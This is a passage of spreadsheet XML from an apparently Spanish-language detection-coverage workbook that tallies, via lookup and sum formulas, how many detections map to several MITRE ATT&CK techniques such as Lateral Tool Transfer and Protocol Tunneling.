        <v>1 (1)</v>
      </c>
      <c r="P62" s="12">
        <v>1</v>
      </c>
      <c r="Q62" s="13">
        <v>1</v>
      </c>
      <c r="R62" s="394">
        <v>1</v>
      </c>
      <c r="S62" s="409">
        <v>1</v>
      </c>
      <c r="T62" s="4">
        <v>1</v>
      </c>
      <c r="U62" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V62" s="4">
        <v>1</v>
      </c>
      <c r="W62" s="13">
        <v>1</v>
      </c>
      <c r="X62" s="394">
        <v>1</v>
      </c>
      <c r="Y62" s="392">
        <v>8</v>
      </c>
      <c r="Z62" s="392">
        <v>3</v>
      </c>
      <c r="AA62" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (8)</v>
      </c>
      <c r="AB62" s="392">
        <v>3</v>
      </c>
      <c r="AC62" s="16">
        <v>1</v>
      </c>
      <c r="AD62" s="394">
        <v>1</v>
      </c>
      <c r="AE62" s="392">
        <v>2</v>
      </c>
      <c r="AF62" s="392">
        <v>2</v>
      </c>
      <c r="AG62" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH62" s="392">
        <v>2</v>
      </c>
      <c r="AI62" s="16">
        <v>1</v>
      </c>
      <c r="AJ62" s="394">
        <v>2</v>
      </c>
      <c r="AK62" s="392">
        <v>10</v>
      </c>
      <c r="AL62" s="392">
        <v>5</v>
      </c>
      <c r="AM62" s="322" t="str">
        <f t="shared" si="5"/>
        <v>5 (10)</v>
      </c>
      <c r="AN62" s="392">
        <v>5</v>
      </c>
      <c r="AO62" s="16">
        <v>1</v>
      </c>
      <c r="AP62" s="394">
        <v>2</v>
      </c>
      <c r="AQ62" s="292">
        <v>0</v>
      </c>
      <c r="AR62" s="322">
        <v>0</v>
      </c>
      <c r="AS62" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT62" s="12">
        <v>0</v>
      </c>
      <c r="AU62" s="13">
        <v>0</v>
      </c>
      <c r="AV62" s="394">
        <v>0</v>
      </c>
      <c r="AW62" s="392">
        <v>0</v>
      </c>
      <c r="AX62" s="392">
        <v>0</v>
      </c>
      <c r="AY62" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ62" s="4">
        <v>0</v>
      </c>
      <c r="BA62" s="16">
        <v>0</v>
      </c>
      <c r="BB62" s="394">
        <v>0</v>
      </c>
      <c r="BC62" s="292">
        <v>1</v>
      </c>
      <c r="BD62" s="322">
        <v>1</v>
      </c>
      <c r="BE62" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF62" s="12">
        <v>1</v>
      </c>
      <c r="BG62" s="13">
        <v>1</v>
      </c>
      <c r="BH62" s="394">
        <v>1</v>
      </c>
      <c r="BI62" s="292">
        <v>0</v>
      </c>
      <c r="BJ62" s="322">
        <v>0</v>
      </c>
      <c r="BK62" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL62" s="12">
        <v>0</v>
      </c>
      <c r="BM62" s="13">
        <v>0</v>
      </c>
      <c r="BN62" s="394">
        <v>0</v>
      </c>
      <c r="BO62" s="292">
        <v>13</v>
      </c>
      <c r="BP62" s="322">
        <v>13</v>
      </c>
      <c r="BQ62" s="322" t="str">
        <f t="shared" si="10"/>
        <v>13 (13)</v>
      </c>
      <c r="BR62" s="12">
        <v>0</v>
      </c>
      <c r="BS62" s="12">
        <v>8</v>
      </c>
      <c r="BT62" s="13">
        <v>1</v>
      </c>
      <c r="BU62" s="394">
        <v>10</v>
      </c>
      <c r="BV62" s="292">
        <v>0</v>
      </c>
      <c r="BW62" s="322">
        <v>0</v>
      </c>
      <c r="BX62" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY62" s="12">
        <v>0</v>
      </c>
      <c r="BZ62" s="13">
        <v>0</v>
      </c>
      <c r="CA62" s="394">
        <v>0</v>
      </c>
      <c r="CB62" s="292">
        <v>0</v>
      </c>
      <c r="CC62" s="322">
        <v>0</v>
      </c>
      <c r="CD62" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE62" s="12">
        <v>0</v>
      </c>
      <c r="CF62" s="12">
        <v>0</v>
      </c>
      <c r="CG62" s="13">
        <v>0</v>
      </c>
      <c r="CH62" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:86" ht="15" customHeight="1">
      <c r="A63" s="4">
        <f t="shared" si="13"/>
        <v>61</v>
      </c>
      <c r="B63" s="4" t="str">
        <f>IFERROR(VLOOKUP(A63,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1570</v>
      </c>
      <c r="C63" s="493" t="str">
        <f>IFERROR(VLOOKUP(B63,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Lateral Tool Transfer</v>
      </c>
      <c r="D63" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B63)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E63" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F63" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (7)</v>
      </c>
      <c r="G63" s="292">
        <v>0</v>
      </c>
      <c r="H63" s="322">
        <v>0</v>
      </c>
      <c r="I63" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J63" s="12">
        <v>0</v>
      </c>
      <c r="K63" s="13">
        <v>0</v>
      </c>
      <c r="L63" s="394">
        <v>0</v>
      </c>
      <c r="M63" s="322">
        <v>3</v>
      </c>
      <c r="N63" s="322">
        <v>2</v>
      </c>
      <c r="O63" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (3)</v>
      </c>
      <c r="P63" s="12">
        <v>1</v>
      </c>
      <c r="Q63" s="13">
        <v>1</v>
      </c>
      <c r="R63" s="394">
        <v>2</v>
      </c>
      <c r="S63" s="409">
        <v>3</v>
      </c>
      <c r="T63" s="4">
        <v>2</v>
      </c>
      <c r="U63" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (3)</v>
      </c>
      <c r="V63" s="4">
        <v>1</v>
      </c>
      <c r="W63" s="13">
        <v>1</v>
      </c>
      <c r="X63" s="394">
        <v>2</v>
      </c>
      <c r="Y63" s="392">
        <v>0</v>
      </c>
      <c r="Z63" s="392">
        <v>0</v>
      </c>
      <c r="AA63" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB63" s="392">
        <v>0</v>
      </c>
      <c r="AC63" s="16">
        <v>0</v>
      </c>
      <c r="AD63" s="394">
        <v>0</v>
      </c>
      <c r="AE63" s="392">
        <v>3</v>
      </c>
      <c r="AF63" s="392">
        <v>2</v>
      </c>
      <c r="AG63" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (3)</v>
      </c>
      <c r="AH63" s="392">
        <v>1</v>
      </c>
      <c r="AI63" s="16">
        <v>1</v>
      </c>
      <c r="AJ63" s="394">
        <v>2</v>
      </c>
      <c r="AK63" s="392">
        <v>3</v>
      </c>
      <c r="AL63" s="392">
        <v>2</v>
      </c>
      <c r="AM63" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (3)</v>
      </c>
      <c r="AN63" s="392">
        <v>1</v>
      </c>
      <c r="AO63" s="16">
        <v>1</v>
      </c>
      <c r="AP63" s="394">
        <v>2</v>
      </c>
      <c r="AQ63" s="292">
        <v>0</v>
      </c>
      <c r="AR63" s="322">
        <v>0</v>
      </c>
      <c r="AS63" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT63" s="12">
        <v>0</v>
      </c>
      <c r="AU63" s="13">
        <v>0</v>
      </c>
      <c r="AV63" s="394">
        <v>0</v>
      </c>
      <c r="AW63" s="392">
        <v>0</v>
      </c>
      <c r="AX63" s="392">
        <v>0</v>
      </c>
      <c r="AY63" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ63" s="4">
        <v>0</v>
      </c>
      <c r="BA63" s="16">
        <v>0</v>
      </c>
      <c r="BB63" s="394">
        <v>0</v>
      </c>
      <c r="BC63" s="292">
        <v>3</v>
      </c>
      <c r="BD63" s="322">
        <v>2</v>
      </c>
      <c r="BE63" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (3)</v>
      </c>
      <c r="BF63" s="12">
        <v>1</v>
      </c>
      <c r="BG63" s="13">
        <v>1</v>
      </c>
      <c r="BH63" s="394">
        <v>2</v>
      </c>
      <c r="BI63" s="292">
        <v>2</v>
      </c>
      <c r="BJ63" s="322">
        <v>1</v>
      </c>
      <c r="BK63" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL63" s="12">
        <v>1</v>
      </c>
      <c r="BM63" s="13">
        <v>1</v>
      </c>
      <c r="BN63" s="394">
        <v>1</v>
      </c>
      <c r="BO63" s="292">
        <v>2</v>
      </c>
      <c r="BP63" s="322">
        <v>1</v>
      </c>
      <c r="BQ63" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (2)</v>
      </c>
      <c r="BR63" s="12">
        <v>1</v>
      </c>
      <c r="BS63" s="12">
        <v>0</v>
      </c>
      <c r="BT63" s="13">
        <v>1</v>
      </c>
      <c r="BU63" s="394">
        <v>1</v>
      </c>
      <c r="BV63" s="292">
        <v>0</v>
      </c>
      <c r="BW63" s="322">
        <v>0</v>
      </c>
      <c r="BX63" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY63" s="12">
        <v>0</v>
      </c>
      <c r="BZ63" s="13">
        <v>0</v>
      </c>
      <c r="CA63" s="394">
        <v>0</v>
      </c>
      <c r="CB63" s="292">
        <v>0</v>
      </c>
      <c r="CC63" s="322">
        <v>0</v>
      </c>
      <c r="CD63" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE63" s="12">
        <v>0</v>
      </c>
      <c r="CF63" s="12">
        <v>0</v>
      </c>
      <c r="CG63" s="13">
        <v>0</v>
      </c>
      <c r="CH63" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:86" ht="15" customHeight="1">
      <c r="A64" s="4">
        <f t="shared" si="13"/>
        <v>62</v>
      </c>
      <c r="B64" s="4" t="str">
        <f>IFERROR(VLOOKUP(A64,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1571</v>
      </c>
      <c r="C64" s="4" t="str">
        <f>IFERROR(VLOOKUP(B64,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Standard Port</v>
      </c>
      <c r="D64" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B64)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F64" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G64" s="292">
        <v>0</v>
      </c>
      <c r="H64" s="322">
        <v>0</v>
      </c>
      <c r="I64" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J64" s="12">
        <v>0</v>
      </c>
      <c r="K64" s="13">
        <v>0</v>
      </c>
      <c r="L64" s="394">
        <v>0</v>
      </c>
      <c r="M64" s="322">
        <v>0</v>
      </c>
      <c r="N64" s="322">
        <v>0</v>
      </c>
      <c r="O64" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P64" s="12">
        <v>0</v>
      </c>
      <c r="Q64" s="13">
        <v>0</v>
      </c>
      <c r="R64" s="394">
        <v>0</v>
      </c>
      <c r="S64" s="409">
        <v>0</v>
      </c>
      <c r="T64" s="4">
        <v>0</v>
      </c>
      <c r="U64" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V64" s="4">
        <v>0</v>
      </c>
      <c r="W64" s="13">
        <v>0</v>
      </c>
      <c r="X64" s="394">
        <v>0</v>
      </c>
      <c r="Y64" s="392">
        <v>0</v>
      </c>
      <c r="Z64" s="392">
        <v>0</v>
      </c>
      <c r="AA64" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB64" s="392">
        <v>0</v>
      </c>
      <c r="AC64" s="16">
        <v>0</v>
      </c>
      <c r="AD64" s="394">
        <v>0</v>
      </c>
      <c r="AE64" s="392">
        <v>0</v>
      </c>
      <c r="AF64" s="392">
        <v>0</v>
      </c>
      <c r="AG64" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH64" s="392">
        <v>0</v>
      </c>
      <c r="AI64" s="16">
        <v>0</v>
      </c>
      <c r="AJ64" s="394">
        <v>0</v>
      </c>
      <c r="AK64" s="392">
        <v>0</v>
      </c>
      <c r="AL64" s="392">
        <v>0</v>
      </c>
      <c r="AM64" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN64" s="392">
        <v>0</v>
      </c>
      <c r="AO64" s="16">
        <v>0</v>
      </c>
      <c r="AP64" s="394">
        <v>0</v>
      </c>
      <c r="AQ64" s="292">
        <v>0</v>
      </c>
      <c r="AR64" s="322">
        <v>0</v>
      </c>
      <c r="AS64" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT64" s="12">
        <v>0</v>
      </c>
      <c r="AU64" s="13">
        <v>0</v>
      </c>
      <c r="AV64" s="394">
        <v>0</v>
      </c>
      <c r="AW64" s="392">
        <v>0</v>
      </c>
      <c r="AX64" s="392">
        <v>0</v>
      </c>
      <c r="AY64" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ64" s="4">
        <v>0</v>
      </c>
      <c r="BA64" s="16">
        <v>0</v>
      </c>
      <c r="BB64" s="394">
        <v>0</v>
      </c>
      <c r="BC64" s="292">
        <v>0</v>
      </c>
      <c r="BD64" s="322">
        <v>0</v>
      </c>
      <c r="BE64" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF64" s="12">
        <v>0</v>
      </c>
      <c r="BG64" s="13">
        <v>0</v>
      </c>
      <c r="BH64" s="394">
        <v>0</v>
      </c>
      <c r="BI64" s="292">
        <v>0</v>
      </c>
      <c r="BJ64" s="322">
        <v>0</v>
      </c>
      <c r="BK64" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL64" s="12">
        <v>0</v>
      </c>
      <c r="BM64" s="13">
        <v>0</v>
      </c>
      <c r="BN64" s="394">
        <v>0</v>
      </c>
      <c r="BO64" s="292">
        <v>1</v>
      </c>
      <c r="BP64" s="322">
        <v>1</v>
      </c>
      <c r="BQ64" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR64" s="12">
        <v>0</v>
      </c>
      <c r="BS64" s="12">
        <v>1</v>
      </c>
      <c r="BT64" s="13">
        <v>1</v>
      </c>
      <c r="BU64" s="394">
        <v>1</v>
      </c>
      <c r="BV64" s="292">
        <v>0</v>
      </c>
      <c r="BW64" s="322">
        <v>0</v>
      </c>
      <c r="BX64" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY64" s="12">
        <v>0</v>
      </c>
      <c r="BZ64" s="13">
        <v>0</v>
      </c>
      <c r="CA64" s="394">
        <v>0</v>
      </c>
      <c r="CB64" s="292">
        <v>1</v>
      </c>
      <c r="CC64" s="322">
        <v>1</v>
      </c>
      <c r="CD64" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE64" s="12">
        <v>0</v>
      </c>
      <c r="CF64" s="12">
        <v>1</v>
      </c>
      <c r="CG64" s="13">
        <v>1</v>
      </c>
      <c r="CH64" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:98" ht="15" customHeight="1">
      <c r="A65" s="4">
        <f t="shared" si="13"/>
        <v>63</v>
      </c>
      <c r="B65" s="4" t="str">
        <f>IFERROR(VLOOKUP(A65,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1572</v>
      </c>
      <c r="C65" s="4" t="str">
        <f>IFERROR(VLOOKUP(B65,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Protocol Tunneling</v>
      </c>
      <c r="D65" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B65)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E65" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B65,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F65" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G65" s="292">
        <v>0</v>
      </c>
      <c r="H65" s="322">
        <v>0</v>
      </c>
      <c r="I65" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J65" s="12">
        <v>0</v>
      </c>
      <c r="K65" s="13">
        <v>0</v>
      </c>
      <c r="L65" s="394">
        <v>0</v>
      </c>
      <c r="M65" s="322">
        <v>1</v>
      </c>
      <c r="N65" s="322">
        <v>1</v>
      </c>
      <c r="O65" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P65" s="12">
        <v>1</v>
      </c>
      <c r="Q65" s="13">
        <v>1</v>
      </c>
      <c r="R65" s="394">
        <v>1</v>
      </c>
      <c r="S65" s="409">
        <v>1</v>
      </c>
      <c r="T65" s="4">
        <v>1</v>
      </c>
      <c r="U65" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V65" s="4">
        <v>1</v>
      </c>
      <c r="W65" s="13">
        <v>1</v>
      </c>
      <c r="X65" s="394">
        <v>1</v>
      </c>
      <c r="Y65" s="392">
        <v>1</v>
      </c>
      <c r="Z65" s="392">
        <v>1</v>
      </c>
      <c r="AA65" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB65" s="392">
        <v>1</v>
      </c>
      <c r="AC65" s="16">
        <v>1</v>
      </c>
      <c r="AD65" s="394">
        <v>1</v>
      </c>
      <c r="AE65" s="392">
        <v>1</v>
      </c>
      <c r="AF65" s="392">
        <v>1</v>
      </c>
      <c r="AG65" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH65" s="392">
        <v>1</v>
      </c>
      <c r="AI65" s="16">
        <v>1</v>
      </c>
      <c r="AJ65" s="394">
        <v>1</v>
      </c>
      <c r="AK65" s="392">
        <v>2</v>
      </c>
      <c r="AL65" s="392">
        <v>2</v>
      </c>
      <c r="AM65" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (2)</v>
      </c>
      <c r="AN65" s="392">
        <v>2</v>
      </c>
      <c r="AO65" s="16">
        <v>1</v>
      </c>
      <c r="AP65" s="394">
        <v>2</v>
      </c>
      <c r="AQ65" s="292">
        <v>0</v>
      </c>
      <c r="AR65" s="322">
        <v>0</v>
      </c>
      <c r="AS65" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT65" s="12">
        <v>0</v>
      </c>
      <c r="AU65" s="13">
        <v>0</v>
      </c>
      <c r="AV65" s="394">
        <v>0</v>
      </c>
      <c r="AW65" s="392">
        <v>1</v>
      </c>
      <c r="AX65" s="392">
        <v>1</v>
      </c>
      <c r="AY65" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ65" s="4">
        <v>1</v>
      </c>
      <c r="BA65" s="16">
        <v>1</v>
      </c>
      <c r="BB65" s="394">
        <v>1</v>
      </c>
      <c r="BC65" s="292">
        <v>2</v>
      </c>
      <c r="BD65" s="322">
        <v>2</v>
      </c>
      <c r="BE65" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (2)</v>
      </c>
      <c r="BF65" s="12">
        <v>2</v>
      </c>
      <c r="BG65" s="13">
        <v>1</v>
      </c>
      <c r="BH65" s="394">
        <v>2</v>
      </c>
      <c r="BI65" s="292">
        <v>4</v>
      </c>
      <c r="BJ65" s="322">
        <v>3</v>
      </c>
      <c r="BK65" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL65" s="12">
        <v>3</v>
      </c>
      <c r="BM65" s="13">
        <v>1</v>
      </c>
      <c r="BN65" s="394">
        <v>2</v>
      </c>
      <c r="BO65" s="292">
        <v>5</v>
      </c>
      <c r="BP65" s="322">
        <v>4</v>
      </c>
      <c r="BQ65" s="322" t="str">
        <f t="shared" si="10"/>
        <v>4 (5)</v>
      </c>
      <c r="BR65" s="12">
        <v>3</v>
      </c>
      <c r="BS65" s="12">
        <v>1</v>
      </c>
      <c r="BT65" s="13">
        <v>1</v>
      </c>
      <c r="BU65" s="394">
        <v>2</v>
      </c>
      <c r="BV65" s="292">
        <v>0</v>
      </c>
      <c r="BW65" s="322">
        <v>0</v>
      </c>
      <c r="BX65" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY65" s="12">
        <v>0</v>
      </c>
      <c r="BZ65" s="13">
        <v>0</v>
      </c>
      <c r="CA65" s="394">
        <v>0</v>
      </c>
      <c r="CB65" s="292">
        <v>1</v>
      </c>
      <c r="CC65" s="322">
        <v>1</v>
      </c>
      <c r="CD65" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE65" s="12">
        <v>0</v>
      </c>
      <c r="CF65" s="12">
        <v>1</v>
      </c>
      <c r="CG65" s="13">
        <v>1</v>
      </c>
      <c r="CH65" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:98" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A66" s="4">
        <f t="shared" si="13"/>
        <v>64</v>
      </c>
      <c r="B66" s="4" t="str">
        <f>IFERROR(VLOOKUP(A66,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1573</v>
      </c>
      <c r="C66" s="4" t="str">
        <f>IFERROR(VLOOKUP(B66,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Encrypted Channel</v>
      </c>
      <c r="D66" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B66)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E66" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B66,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F66" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G66" s="292">
        <v>0</v>
      </c>
      <c r="H66" s="322">
        <v>0</v>
      </c>
      <c r="I66" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J66" s="12">
        <v>0</v>
      </c>
      <c r="K66" s="13">
        <v>0</v>
      </c>
      <c r="L66" s="394">
        <v>0</v>
      </c>
      <c r="M66" s="322">
        <v>0</v>
      </c>
      <c r="N66" s="322">
        <v>0</v>
      </c>
      <c r="O66" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P66" s="12">
        <v>0</v>
      </c>
      <c r="Q66" s="13">
        <v>0</v>
      </c>
      <c r="R66" s="394">
        <v>0</v>
      </c>
      <c r="S66" s="409">
        <v>0</v>
      </c>
      <c r="T66" s="4">
        <v>0</v>
      </c>
      <c r="U66" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V66" s="4">
        <v>0</v>
      </c>
      <c r="W66" s="13">
        <v>0</v>
      </c>
      <c r="X66" s="394">
        <v>0</v>
      </c>
      <c r="Y66" s="392">
        <v>0</v>
      </c>
      <c r="Z66" s="392">
        <v>0</v>
      </c>
      <c r="AA66" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB66" s="392">
        <v>0</v>
      </c>
      <c r="AC66" s="16">
        <v>0</v>
      </c>
      <c r="AD66" s="394">
        <v>0</v>
      </c>
      <c r="AE66" s="392">
        <v>0</v>
      </c>
      <c r="AF66" s="392">
        <v>0</v>
      </c>
      <c r="AG66" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH66" s="392">
        <v>0</v>
      </c>
      <c r="AI66" s="16">
        <v>0</v>
      </c>
      <c r="AJ66" s="394">
        <v>0</v>
      </c>
      <c r="AK66" s="392">
        <v>0</v>
      </c>
      <c r="AL66" s="392">
        <v>0</v>
      </c>
      <c r="AM66" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN66" s="392">
        <v>0</v>
      </c>
      <c r="AO66" s="16">
        <v>0</v>
      </c>
      <c r="AP66" s="394">
        <v>0</v>
      </c>
      <c r="AQ66" s="292">
        <v>0</v>
      </c>
      <c r="AR66" s="322">
        <v>0</v>
      </c>
      <c r="AS66" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT66" s="12">
        <v>0</v>
      </c>
      <c r="AU66" s="13">
        <v>0</v>
      </c>
      <c r="AV66" s="394">
        <v>0</v>
      </c>
      <c r="AW66" s="392">
        <v>0</v>
      </c>
      <c r="AX66" s="392">
        <v>0</v>
      </c>
      <c r="AY66" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ66" s="4">
        <v>0</v>
      </c>
      <c r="BA66" s="16">
        <v>0</v>
      </c>
      <c r="BB66" s="394">
        <v>0</v>
      </c>
      <c r="BC66" s="292">
        <v>0</v>
      </c>
      <c r="BD66" s="322">
        <v>0</v>
      </c>
      <c r="BE66" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF66" s="12">
        <v>0</v>
      </c>
      <c r="BG66" s="13">
        <v>0</v>
      </c>
      <c r="BH66" s="394">
        <v>0</v>
      </c>
      <c r="BI66" s="292">
        <v>0</v>
      </c>
      <c r="BJ66" s="322">
        <v>0</v>
      </c>
      <c r="BK66" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL66" s="12">
        <v>0</v>
      </c>
      <c r="BM66" s="13">
        <v>0</v>
      </c>
      <c r="BN66" s="394">
        <v>0</v>
      </c>
      <c r="BO66" s="292">
        <v>1</v>
      </c>
      <c r="BP66" s="322">
        <v>1</v>
      </c>
      <c r="BQ66" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR66" s="12">
        <v>0</v>
      </c>
      <c r="BS66" s="12">
        <v>1</v>
      </c>
      <c r="BT66" s="13">
        <v>1</v>
      </c>
      <c r="BU66" s="394">
        <v>1</v>
      </c>
      <c r="BV66" s="292">
        <v>0</v>
      </c>
      <c r="BW66" s="322">
        <v>0</v>
      </c>
      <c r="BX66" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY66" s="12">
        <v>0</v>
      </c>
      <c r="BZ66" s="13">
        <v>0</v>
      </c>
      <c r="CA66" s="394">
        <v>0</v>
      </c>
      <c r="CB66" s="292">
        <v>0</v>
      </c>
      <c r="CC66" s="322">
        <v>0</v>
      </c>
      <c r="CD66" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE66" s="12">
        <v>0</v>
      </c>
      <c r="CF66" s="12">
        <v>0</v>
      </c>
      <c r="CG66" s="13">
        <v>0</v>
      </c>
      <c r="CH66" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:98" ht="15" customHeight="1">
      <c r="A67" s="4">
        <f t="shared" si="13"/>
        <v>65</v>
      </c>
      <c r="B67" s="4" t="str">
        <f>IFERROR(VLOOKUP(A67,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1585</v>
      </c>
      <c r="C67" s="4" t="str">
        <f>IFERROR(VLOOKUP(B67,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Establish Accounts</v>
      </c>
      <c r="D67" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B67)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E67" s="4">
